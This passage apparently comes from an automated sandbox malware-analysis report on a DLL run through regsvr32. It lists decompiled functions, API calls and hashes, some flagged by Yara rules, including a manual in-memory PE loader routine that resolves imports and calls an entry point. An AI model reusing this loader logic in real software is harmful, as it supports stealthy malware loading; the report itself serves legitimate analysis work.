            0x6d5105c6
            0x00000000
            0x6d5105c6
            0x6d51058e
            0x6d510592
            0x6d510597
            0x6d51059b
            0x00000000
            0x00000000
            0x6d5105a1
            0x00000000
            0x6d5105a1

            APIs
            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,6D50DAF1,00000000,?,?,?,6D510751,?,?,00000100), ref: 6D51055A
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,6D510751,?,?,00000100,5EFC4D8B,?,?), ref: 6D5105E0
            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6D5106DA
            • __freea.LIBCMT ref: 6D5106E7
              • Part of subcall function 6D50B438: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6D5107B0,00000001,00000000,?,6D50E12F,00000001,00000004,00000000,00000001,?,?,6D50B13D), ref: 6D50B46A
            • __freea.LIBCMT ref: 6D5106F0
            • __freea.LIBCMT ref: 6D510715
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: ByteCharMultiWide__freea$AllocHeap
            • String ID:
            • API String ID: 3147120248-0
            • Opcode ID: f43acc1688a6faeb2c7c526abb56c143bdea0ccb07cc61f1cdedbf56f64febdb
            • Instruction ID: 562003cd55f713cf21eebfd6a6bb7fc1f8e39c98c76786d4e0855021e6c5d8ef
            • Opcode Fuzzy Hash: f43acc1688a6faeb2c7c526abb56c143bdea0ccb07cc61f1cdedbf56f64febdb
            • Instruction Fuzzy Hash: 25510972608217AFFB198E69CC81FBF37A9EF85754F124A2AFD24D6540DB34DCA08650
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027ADF29 Relevance: 9.1, APIs: 6, Instructions: 98stringCOMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E027ADF29(WCHAR* __ecx) {
				int _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				WCHAR* _v140;
				WCHAR* _v144;
				short _v664;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				WCHAR* _t36;
				int _t40;
				signed int _t41;
				int _t44;
				signed int _t45;
				WCHAR* _t49;
				signed int _t51;
				WCHAR* _t52;
				void* _t53;

				_v8 = _v8 & 0x00000000;
				_v16 = __ecx;
				_t51 = 0;
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
				_t44 = _v8;
				_t41 = 0;
				_v12 = _t28;
				if(_t44 <= 0) {
					L22:
					_t29 = _t28 | 0xffffffff;
					__eflags = _t29;
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t49 =  *(_t28 + _t41 * 4);
					_t30 =  *_t49 & 0x0000ffff;
					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
						_t40 = lstrlenW(_t49);
						_t45 = 0;
						if(_t40 <= 0) {
							L11:
							_t44 = _v8;
							_t51 = _t51 + 1;
							goto L12;
						} else {
							goto L8;
						}
						do {
							L8:
							if(_t49[_t45] == 0x2c) {
								_t49[_t45] = 0;
							}
							_t45 = _t45 + 1;
						} while (_t45 < _t40);
						goto L11;
					}
					L12:
					_t28 = _v12;
					_t41 = _t41 + 1;
				} while (_t41 < _t44);
				if(_t51 != 1) {
					if(__eflags <= 0) {
						goto L22;
					}
					_t52 = _v140;
					L17:
					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
						lstrcpynW(_v16, _t52, 0x104);
					} else {
						GetCurrentDirectoryW(0x104,  &_v664);
						_push(0);
						_push(_t52);
						_push(0x27bc9d8);
						_t36 = E027A9BF7( &_v664);
						_v12 = _t36;
						lstrcpynW(_v16, _t36, 0x104);
						E027A8D86( &_v12, 0xfffffffe);
					}
					return 0;
				}
				_t52 = _v144;
				goto L17;
			}





















            0x027adf32
            0x027adf39
            0x027adf3c
            0x027adf49
            0x027adf4f
            0x027adf52
            0x027adf54
            0x027adf59
            0x027ae031
            0x027ae031
            0x027ae031
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x027adf5f
            0x027adf5f
            0x027adf5f
            0x027adf62
            0x027adf68
            0x027adf84
            0x027adf8b
            0x027adf91
            0x027adf95
            0x027adfa9
            0x027adfa9
            0x027adfac
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x027adf97
            0x027adf97
            0x027adf9c
            0x027adfa0
            0x027adfa0
            0x027adfa4
            0x027adfa5
            0x00000000
            0x027adf97
            0x027adfad
            0x027adfad
            0x027adfb0
            0x027adfb1
            0x027adfb8
            0x027adfc2
            0x00000000
            0x00000000
            0x027adfc4
            0x027adfca
            0x027adfce
            0x027ae027
            0x027adfd7
            0x027adfe4
            0x027adfea
            0x027adfec
            0x027adff3
            0x027adff9
            0x027ae001
            0x027ae009
            0x027ae015
            0x027ae01b
            0x00000000
            0x027ae02d
            0x027adfba
            0x00000000

            APIs
            • GetCommandLineW.KERNEL32 ref: 027ADF3E
            • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 027ADF49
            • lstrlenW.KERNEL32 ref: 027ADF8B
            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 027ADFE4
            • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 027AE009
            • lstrcpynW.KERNEL32(?,?,00000104), ref: 027AE027
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
            • String ID:
            • API String ID: 1259063344-0
            • Opcode ID: 2aa5857b35f8b06892ae48f8f84d8e769949dc7499d35add6017edbc3028caae
            • Instruction ID: 8efa5718db0d841e3506bef11e86ab8b88b928e83daf4306d58ba006169125a7
            • Opcode Fuzzy Hash: 2aa5857b35f8b06892ae48f8f84d8e769949dc7499d35add6017edbc3028caae
            • Instruction Fuzzy Hash: B0313771C00115EBDF35AB54C898FAFB7B8EF86734F20866AE521E24A0E7709991CF50
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027AE759 Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
            Download Yara Rule
            APIs
            • SysAllocString.OLEAUT32(00000000), ref: 027AE76D
            • SysAllocString.OLEAUT32(?), ref: 027AE775
            • SysAllocString.OLEAUT32(00000000), ref: 027AE789
            • SysFreeString.OLEAUT32(?), ref: 027AE804
            • SysFreeString.OLEAUT32(?), ref: 027AE807
            • SysFreeString.OLEAUT32(?), ref: 027AE80C
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: String$AllocFree
            • String ID:
            • API String ID: 344208780-0
            • Opcode ID: 3e60fe9168a5ef368c663a57889438ab0e01c12036645fcbd1ed481891faab8f
            • Instruction ID: da755325e0ad7d61f81d5ea67a73b323f75426c0f23b66558f74137fa6c6f81b
            • Opcode Fuzzy Hash: 3e60fe9168a5ef368c663a57889438ab0e01c12036645fcbd1ed481891faab8f
            • Instruction Fuzzy Hash: CC21FB75900219FFDB00DFA5CC88DAEBBBDEF88254B2045AAF515A7250D771AE01CB60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D509791 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
            Download Yara Rule
            C-Code - Quality: 95%
            			E6D509791(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x6d55ce10 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E6D509A8E(__eflags,  *0x6d55ce10);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6D509AC8(__eflags,  *0x6d55ce10, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E6D50B523(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6D509AC8(__eflags,  *0x6d55ce10, 0);
								} else {
									__eflags = E6D509AC8(__eflags,  *0x6d55ce10, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6D50B3FE(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}








            0x6d509798
            0x6d5097ab
            0x6d5097b2
            0x6d5097b5
            0x6d5097b8
            0x6d5097d1
            0x6d5097d1
            0x6d5097ba
            0x6d5097ba
            0x6d5097bc
            0x6d5097c6
            0x6d5097cc
            0x6d5097cd
            0x6d5097cf
            0x6d5097df
            0x6d5097e3
            0x6d5097e5
            0x6d5097f9
            0x6d5097f9
            0x6d509802
            0x6d5097e7
            0x6d5097f5
            0x6d5097f7
            0x6d50980b
            0x6d50980d
            0x6d50980d
            0x00000000
            0x00000000
            0x00000000
            0x6d5097f7
            0x6d509810
            0x00000000
            0x00000000
            0x00000000
            0x6d5097cf
            0x6d5097bc
            0x6d509818
            0x6d509822
            0x6d50979a
            0x6d50979c
            0x6d50979c

            APIs
            • GetLastError.KERNEL32(00000001,?,6D509584,6D5084B2,6D5080FB,?,6D50830B,?,00000001,?,?,00000001,?,6D53E618,0000000C,6D5083F4), ref: 6D50979F
            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D5097AD
            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D5097C6
            • SetLastError.KERNEL32(00000000,6D50830B,?,00000001,?,?,00000001,?,6D53E618,0000000C,6D5083F4,?,00000001,?), ref: 6D509818
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: ErrorLastValue___vcrt_
            • String ID:
            • API String ID: 3852720340-0
            • Opcode ID: 427f29a7f57f7ae628c1ed0267d58402269bbcf32bc578fe66ca0013a7e5a65e
            • Instruction ID: 945bb50c419f9a594c87d5009da16ff5aa78d712236e7cd96445faaea6ed250b
            • Opcode Fuzzy Hash: 427f29a7f57f7ae628c1ed0267d58402269bbcf32bc578fe66ca0013a7e5a65e
            • Instruction Fuzzy Hash: FE01F53210D2136EAF1F16786C857772B79EB837B872E0629E23048DD8EF524C609A80
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50A6AB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6D50A65C,?,?,6D50A5FC,?,6D53E678,0000000C,6D50A72F,00000000,00000000), ref: 6D50A6CB
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D50A6DE
            • FreeLibrary.KERNEL32(00000000,?,?,?,6D50A65C,?,?,6D50A5FC,?,6D53E678,0000000C,6D50A72F,00000000,00000000,00000001,6D508275), ref: 6D50A701
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            • Opcode ID: 7dc49902eb13282a37b9fb3a5ef3dcc694164543e200050a75a590d1e1ffc866
            • Instruction ID: 2107d41b333920de5aa8509b588315326755455225463b455f804226b95c24df
            • Opcode Fuzzy Hash: 7dc49902eb13282a37b9fb3a5ef3dcc694164543e200050a75a590d1e1ffc866
            • Instruction Fuzzy Hash: 1FF06271900219BBCF09AF90CC49FBD7FB5EF06352F024064F825A2A50DF719A80CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027B3DE4 Relevance: 7.8, APIs: 5, Instructions: 322libraryloaderstringCOMMON
            Download Yara Rule
            C-Code - Quality: 20%
            			E027B3DE4(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				signed int* _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed short* _v52;
				intOrPtr _v56;
				unsigned int _v60;
				intOrPtr _v64;
				_Unknown_base(*)()* _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				CHAR* _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _t216;
				signed int _t233;
				void* _t273;
				signed int _t278;
				signed int _t280;
				intOrPtr _t320;

				_v44 = _v44 & 0x00000000;
				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v20 = _v84;
				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
				_v64 = _t320;
				if(_t320 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
						L35:
						if(_a16 == 0) {
							L54:
							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
							while(0 != 0) {
							}
							if(_a12 != 0) {
								 *_a12 = _v80;
							}
							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
							_v124 = _v80(_a4, 1, _a8);
							while(0 != 0) {
							}
							if(_v124 != 0) {
								if(_v44 == 0) {
									L77:
									return 1;
								}
								if(_a20 != 1) {
									if(_a20 != 2) {
										L75:
										while(0 != 0) {
										}
										goto L77;
									}
									while(0 != 0) {
									}
									_v132 = _v44;
									goto L75;
								}
								while(0 != 0) {
								}
								_v44();
								goto L75;
							}
							while(0 != 0) {
							}
							return 0;
						}
						while(0 != 0) {
						}
						_push(8);
						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
							goto L54;
						}
						_v128 = 0x80000000;
						_t216 = 8;
						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
						_v104 =  *((intOrPtr*)(_v76 + 0x18));
						while(0 != 0) {
						}
						_v40 = _v40 & 0x00000000;
						while(_v40 < _v104) {
							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
							if(lstrcmpA(_v116, _a16) != 0) {
								_v40 = _v40 + 1;
								continue;
							}
							while(0 != 0) {
							}
							_v44 = _v120;
							break;
						}
						if(_v44 != 0) {
							goto L54;
						}
						while(0 != 0) {
						}
						return 0xffffffff;
					}
					_v96 = 0x80000000;
					_t233 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v24 =  *_v16 + _a4;
							}
							_v72 = _v72 & 0x00000000;
							while( *_v24 != 0) {
								if(( *_v24 & _v96) == 0) {
									_v100 =  *_v24 + _a4;
									_v68 = GetProcAddress(_v36, _v100 + 2);
								} else {
									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v24 = _v68;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
								}
								_v24 =  &(_v24[1]);
								_v72 = _v72 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t273 = 0xfffffffd;
							return _t273;
						}
					}
					goto L35;
				}
				_t278 = 8;
				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
				_t280 = 8;
				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
				while(0 != 0) {
				}
				while(_v56 > 0) {
					_v28 = _v52[2];
					_v56 = _v56 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v52[4]);
					_v92 = _a4 +  *_v52;
					_v60 = _v28;
					while(1) {
						_v88 = _v60;
						_v60 = _v60 - 1;
						if(_v88 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v48 = (_v12 & 0x0000ffff) + _v92;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v48 =  *_v48 + _v64;
							}
						} else {
							 *_v48 =  *_v48 + _v64;
						}
						_v32 =  &(_v32[1]);
					}
					_v52 = _v32;
				}
				goto L13;
			}









































            0x027b3ded
            0x027b3dfa
            0x027b3e00
            0x027b3e09
            0x027b3e0c
            0x027b3e0f
            0x00000000
            0x027b3f00
            0x027b3f04
            0x027b3f06
            0x027b3f14
            0x027b4032
            0x027b4036
            0x027b40fb
            0x027b4104
            0x027b4107
            0x027b410b
            0x027b4111
            0x027b4119
            0x027b4119
            0x027b4121
            0x027b412f
            0x027b4132
            0x027b4136
            0x027b413c
            0x027b414c
            0x027b4177
            0x00000000
            0x027b4179
            0x027b4152
            0x027b4163
            0x00000000
            0x027b4171
            0x027b4175
            0x00000000
            0x027b4171
            0x027b4165
            0x027b4169
            0x027b416e
            0x00000000
            0x027b416e
            0x027b4154
            0x027b4158
            0x027b415a
            0x00000000
            0x027b415a
            0x027b413e
            0x027b4142
            0x00000000
            0x027b4144
            0x027b403c
            0x027b4040
            0x027b4042
            0x027b4050
            0x00000000
            0x00000000
            0x027b4056
            0x027b405f
            0x027b406d
            0x027b4079
            0x027b4085
            0x027b408e
            0x027b4091
            0x027b4095
            0x027b4097
            0x027b40a4
            0x027b40b8
            0x027b40c7
            0x027b40d8
            0x027b40a1
            0x00000000
            0x027b40a1
            0x027b40da
            0x027b40de
            0x027b40e3
            0x00000000
            0x027b40e3
            0x027b40ee
            0x00000000
            0x00000000
            0x027b40f0
            0x027b40f4
            0x00000000
            0x027b40f6
            0x027b3f1a
            0x027b3f23
            0x027b3f31
            0x027b3f34
            0x027b3f51
            0x027b3f58
            0x027b3f6a
            0x027b3f6a
            0x027b3f71
            0x027b3f81
            0x027b3f99
            0x027b3f83
            0x027b3f8b
            0x027b3f8b
            0x027b3f9c
            0x027b3fa0
            0x027b3fb0
            0x027b3fd3
            0x027b3fe5
            0x027b3fb2
            0x027b3fc6
            0x027b3fc6
            0x027b3fef
            0x027b400b
            0x027b3ff1
            0x027b4000
            0x027b4000
            0x027b4013
            0x027b401c
            0x027b401c
            0x027b402a
            0x00000000
            0x027b3f73
            0x027b3f75
            0x00000000
            0x027b3f75
            0x027b3f71
            0x00000000
            0x027b3f34
            0x027b3e17
            0x027b3e25
            0x027b3e2a
            0x027b3e35
            0x027b3e38
            0x027b3e3c
            0x027b3e3e
            0x027b3e4e
            0x027b3e57
            0x027b3e60
            0x027b3e68
            0x027b3e71
            0x027b3e7c
            0x027b3e82
            0x027b3e85
            0x027b3e88
            0x027b3e8f
            0x027b3e96
            0x00000000
            0x00000000
            0x027b3ea1
            0x027b3eaf
            0x027b3eba
            0x027b3ec4
            0x027b3edc
            0x027b3ee9
            0x027b3ee9
            0x027b3ec6
            0x027b3ed1
            0x027b3ed1
            0x027b3ef0
            0x027b3ef0
            0x027b3ef8
            0x027b3ef8
            0x00000000

            APIs
            • GetModuleHandleA.KERNEL32(00000000), ref: 027B3F4B
            • LoadLibraryA.KERNEL32(00000000), ref: 027B3F64
            • GetProcAddress.KERNEL32(00000000,?), ref: 027B3FC0
            • GetProcAddress.KERNEL32(00000000,?), ref: 027B3FDF
            • lstrcmpA.KERNEL32(?,00000000), ref: 027B40D0
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
            • String ID:
            • API String ID: 1872726118-0
            • Opcode ID: 93ce4f3db7e5761cc2ac9aa22691931d4237ec4f6c8e74e69c8484881b9a097d
            • Instruction ID: 764ef692f17fc026bc4fd2badb539aa5d58a1c90a8fc63a5d5b883d3040c21ed
            • Opcode Fuzzy Hash: 93ce4f3db7e5761cc2ac9aa22691931d4237ec4f6c8e74e69c8484881b9a097d
            • Instruction Fuzzy Hash: 15E18D75E00219DFCB15CFA8C8A4BEDBBB1BF08354F1485AAE815AB391D734A981CF54
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027B1A27 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: @$\u%04X$\u%04X\u%04X
            • API String ID: 0-2132903582
            • Opcode ID: 3f1537d7d41d111c4a2e8257874e6a011421a15b3a3a8a62b390bd330c33fc0d
            • Instruction ID: 0033029c1b09427bc3af2abf0a109bbd9574781c2651e6ae3b016049e306b0ee
            • Opcode Fuzzy Hash: 3f1537d7d41d111c4a2e8257874e6a011421a15b3a3a8a62b390bd330c33fc0d
            • Instruction Fuzzy Hash: 7041F571B1020997DB2B4A6C8CBDBFF3B69DF42218F940025FF1AE6244F3619991C6A5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027B33F7 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
            Download Yara Rule
            C-Code - Quality: 83%
            			E027B33F7(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L027B3550();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E027B33D0(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E027A8E72(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x27b1be2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













            0x027b33f7
            0x027b33fa
            0x027b33ff
            0x027b3403
            0x027b3403
            0x027b3409
            0x027b340d
            0x027b340e
            0x027b3411
            0x027b3412
            0x027b3417
            0x027b341a
            0x027b341b
            0x027b3420
            0x027b3427
            0x027b34b0
            0x027b34b0
            0x00000000
            0x027b3432
            0x027b3433
            0x027b3445
            0x027b346b
            0x027b346b
            0x027b3474
            0x027b3476
            0x027b347c
            0x027b34ab
            0x027b34ab
            0x027b34b3
            0x027b34b6
            0x027b34b6
            0x027b347e
            0x027b347f
            0x027b3485
            0x027b3487
            0x027b3487
            0x027b348c
            0x027b348b
            0x027b348b
            0x027b3493
            0x027b349f
            0x027b34a9
            0x027b34a9
            0x00000000
            0x027b3455
            0x027b3455
            0x027b3455
            0x027b345b
            0x00000000
            0x00000000
            0x027b345d
            0x027b3463
            0x027b3468
            0x00000000
            0x027b3468
            0x027b3445

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: strchr$_snprintf
            • String ID: %.*g
            • API String ID: 3619936089-952554281
            • Opcode ID: c64953c20d587f9aa8f1c503451e926e865734f0879017c222c2f947e0914148
            • Instruction ID: e5888ebdd1462f6116a1ea8b89db4648e17a286165222e70c7c92a12ca583d73
            • Opcode Fuzzy Hash: c64953c20d587f9aa8f1c503451e926e865734f0879017c222c2f947e0914148
            • Instruction Fuzzy Hash: 55213672644A2526EB239E68DC89FFB37989F00728F1441E9FD049A280FBB4D9C047D5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50768E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 346COMMON
            Download Yara Rule
            C-Code - Quality: 46%
            			E6D50768E() {
				intOrPtr _t198;
				signed int _t205;
				intOrPtr _t206;
				signed int _t219;
				struct _CRITICAL_SECTION* _t226;
				signed int _t238;
				intOrPtr _t244;
				void* _t251;
				signed int _t276;
				signed int _t280;
				void* _t284;
				intOrPtr _t300;
				signed int _t301;
				signed int _t305;
				intOrPtr _t307;
				signed int _t317;
				signed int _t318;
				signed int _t322;
				signed int _t329;
				void* _t331;
				intOrPtr _t332;
				intOrPtr _t334;
				intOrPtr _t335;
				signed int _t336;
				signed int _t341;
				void* _t350;
				signed int _t351;
				intOrPtr _t353;
				void* _t355;
				intOrPtr _t357;
				signed int* _t358;
				intOrPtr _t363;
				signed int _t365;
				void* _t371;
				void* _t372;
				void* _t373;

				_t307 =  *((intOrPtr*)(_t371 + 0x54));
				_t357 =  *((intOrPtr*)(_t371 + 0x68));
				 *((intOrPtr*)(_t371 + 0xc)) = _t307 + 0x41e;
				_t363 =  *((intOrPtr*)(_t371 + 0x54)) + 0xfffffd78;
				_t353 =  *((intOrPtr*)(_t371 + 0x78));
				 *((intOrPtr*)(_t371 + 0x14)) = _t307 + 0x140;
				_t300 = _t357 + 0x6f9;
				 *((intOrPtr*)(_t371 + 0x5c)) = _t363;
				 *((intOrPtr*)(_t371 + 0x18)) = _t307 - 0x2872;
				_push(_t357);
				 *((intOrPtr*)(_t371 + 0x80)) =  *((intOrPtr*)(_t371 + 0x80)) + 0x956;
